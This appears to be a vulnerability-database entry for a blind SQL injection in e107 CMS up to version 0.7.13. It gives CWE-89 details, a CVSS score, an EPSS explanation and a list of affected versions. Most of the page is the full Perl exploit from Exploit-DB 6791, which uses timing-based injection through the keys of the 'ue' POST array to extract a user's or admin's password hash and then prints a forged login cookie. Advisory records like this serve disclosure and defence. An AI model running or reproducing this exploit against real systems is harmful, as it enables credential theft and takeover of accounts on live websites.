Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-89 |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.5 |
|
AV:N/AC:L/Au:S/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 6791
Publication date : 2008-10-18 22h00 +00:00
Author : girex
EDB Verified : Yes
# Author: __GiReX__
# Homepage: http://girex.altervista.org
# Date: 19/10/2008
# CMS: e107
# URL: http://e107.org/
# Note: Works regardless of php.ini settings (magic_quotes, register_globals..)
# Attenction: This exploit was written for educational purpose.
# Use it at your own risk. Author will be not responsible for any damage.
# Description: e107 is a content management system written in PHP
# and using the popular open source MySQL database system for content storage.
# It's completely free, totally customisable and in constant development.
# Bug description:
# e107 presents a vuln in userssettings.php (line 363-395), a POST array ($_POST['ue'])
# goes into an update query, it cleans the values of this array but not the keys name...
# File: usersettings.php (line 363-395)
if($_POST['ue'])
...
foreach($_POST['ue'] as $key => $val)
$err = $ue->user_extended_validate_entry($val,$extList[$key]);
if(!$err)
$val = $tp->toDB($val); <== Cleans values
$ue_fields .= $key."='".$val."'"; <== Here our $_POST['ue'] keys and values
}
}
...
# Lines: 496-500
if($ue_fields)
{
// ***** Next line creates a record which presumably should be there anyway, so could generate an error
$sql->db_Select_gen("INSERT INTO #user_extended (user_extended_id, user_hidden_fields) values ('".intval($inp)."', '')");
$sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'"); <== Here vulnearable query
}
# As you can see the return value of the update query isn't checked so we have to use a blind benchmark() method
#!/usr/bin/perl
# e107 <= 0.7.13 Blind SQL Injection Exploit
# Admin/User's Password Retrieve Exploit
# Works regardless of php.ini settings
# Coded by __GiReX__
use POSIX;
use LWP::UserAgent;
use HTTP::Cookies;
use Digest::MD5 qw(md5 md5_hex md5_base64);
if(@ARGV < 4)
{
banner();
print "[+] You need an user account to run this exploit\n\n";
print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass> <victim_id>\n";
print "[+] Example: perl $0 localhost /e107/ test password 1\n";
exit;
}
my $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0].$ARGV[1]: 'http://' . $ARGV[0].$ARGV[1];
my ($user, $pass, $id) = ($ARGV[2], $ARGV[3], ($ARGV[4]) ? $ARGV[4] : 1);
my $lwp = new LWP::UserAgent or die;
my $cookie_jar = new HTTP::Cookies or die;
$lwp->cookie_jar( $cookie_jar );
my @cset = (48..57, 97..102);
my $benchmark = 1000000;
my $prefix = "e107";
my $hash = "";
banner();
try_login($user, $pass) or die "[-] Unable to login with $user and $pass\n";
syswrite(STDOUT, "[+] Logged in with your account..\n".
"[+] Checking database delay, please wait..\n\n" );
$ndelay = check_bench("1=0");
print STDOUT "[+] Normal delay: $ndelay\n";
$bdelay = check_bench("1=1");
print STDOUT "[+] Benchmark delay: $bdelay\n\n";
if($bdelay - $ndelay < 4)
{
print STDOUT "[-] Benchmarck delay too small compared to normal delay, increase it.\n";
exit ();
}
for(my $j = 1; $j <= 32; $j++)
{
foreach $char(@cset)
{
info(chr($char), $hash, "password");
my ($pre_time, $post_time) = time();
$rv = check_char($char, $j, "user_password");
$post_time = time();
if($rv and ($post_time - $pre_time) > ($ndelay + 3))
{
$hash .= chr($char);
last;
}
}
last if $j != length($hash);
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
exit;
}
else
{
print STDOUT "\n\n[+] You can try to login with this cookie:\n";
print STDOUT "[+] Cookie: ${cookie_prefix}cookie=${id}.". md5_hex($hash)."\n";
}
sub try_login
{
my ($user, $pass) = @_;
my $res = $lwp->post( $target.'news.php' ,
[ 'username' => $user,
'userpass' => $pass,
'userlogin' => 'Login',
'autologin' => '1' ] );
if($res->status_line =~ /^302|200|301/ or $res->is_success)
{
if($res->as_string =~ /Set-Cookie: (.+)cookie/)
{
$cookie_prefix = $1;
return 1;
}
return undef;
}
die ("[-] Unable to request ${target}news.php ".$res->status_line."\n");
}
sub info
{
my($c, $cur, $str) = @_;
$cur = '' unless defined $cur;
print STDOUT "[+] Victim ${str}: ${cur}${c}\r";
$| = 1;
}
sub check_bench
{
my $true = shift;
my $delay = 0;
my $sql = "user_hidden_fields=99 AND CASE WHEN(${true}) THEN benchmark(${benchmark}, MD5(1)) END#";
for(1..3)
{
my ($pre_time, $post_time) = time();
my $res = $lwp->post( $target.'usersettings.php',
[ 'email' => 'damn@email.com',
'updatesettings' => 'Save Settings',
"ue[${sql}]" => 'damn' ]);
$post_time = time();
$delay += int($post_time - $pre_time);
}
return ceil($delay / 3);
}
sub check_char
{
my ($char, $n, $field) = @_ ;
$rand = int($char + $n);
my $sql = "user_hidden_fields=${rand} AND CASE WHEN(SELECT ASCII(SUBSTRING(${field},${n},1)) ".
"FROM ${prefix}_user WHERE user_id=${id})=${char} THEN benchmark(${benchmark}, MD5(1)) END#";
my $res = $lwp->post( $target.'usersettings.php',
[ 'email' => 'damn@email.com',
'updatesettings' => 'Save Settings',
"ue[${sql}]" => 'damn' ]);
return $res->is_success;
}
sub banner
{
print "\n";
print "[+] e107 <= 0.7.13 Blind SQL Injection\n";
print "[+] Admin/User's Password Retrieve Exploit\n";
print "[+] Coded by __GiReX__\n";
print "\n";
}
# milw0rm.com [2008-10-19]
Products Mentioned
Configuraton 0
E107>>E107 >> Version To (including) 0.7.13
E107>>E107 >> Version 0.7
E107>>E107 >> Version 0.7.1
E107>>E107 >> Version 0.7.2
E107>>E107 >> Version 0.7.3
E107>>E107 >> Version 0.7.4
E107>>E107 >> Version 0.7.5
E107>>E107 >> Version 0.7.6
E107>>E107 >> Version 0.7.7
E107>>E107 >> Version 0.7.8
E107>>E107 >> Version 0.7.9
E107>>E107 >> Version 0.7.10
E107>>E107 >> Version 0.7.11
E107>>E107 >> Version 0.547_beta
E107>>E107 >> Version 0.548_beta
E107>>E107 >> Version 0.549_beta
E107>>E107 >> Version 0.551_beta
E107>>E107 >> Version 0.552_beta
E107>>E107 >> Version 0.553_beta
E107>>E107 >> Version 0.554_beta
E107>>E107 >> Version 0.555_beta
E107>>E107 >> Version 0.600
E107>>E107 >> Version 0.601
E107>>E107 >> Version 0.602
E107>>E107 >> Version 0.603
E107>>E107 >> Version 0.604
E107>>E107 >> Version 0.605
E107>>E107 >> Version 0.606
E107>>E107 >> Version 0.607
E107>>E107 >> Version 0.608
E107>>E107 >> Version 0.609
E107>>E107 >> Version 0.610
E107>>E107 >> Version 0.611
E107>>E107 >> Version 0.612
E107>>E107 >> Version 0.613
E107>>E107 >> Version 0.614
E107>>E107 >> Version 0.615
E107>>E107 >> Version 0.615a
E107>>E107 >> Version 0.616
E107>>E107 >> Version 0.617
E107>>E107 >> Version 0.6171
E107>>E107 >> Version 0.6172
E107>>E107 >> Version 0.6173
E107>>E107 >> Version 0.6174
E107>>E107 >> Version 0.6175
E107>>E107 >> Version 5.1
E107>>E107 >> Version 5.3_beta
E107>>E107 >> Version 5.3_beta2
E107>>E107 >> Version 5.04
E107>>E107 >> Version 5.4_beta1
E107>>E107 >> Version 5.4_beta3
E107>>E107 >> Version 5.4_beta4
E107>>E107 >> Version 5.4_beta5
E107>>E107 >> Version 5.4_beta6
E107>>E107 >> Version 5.05
E107>>E107 >> Version 5.21
References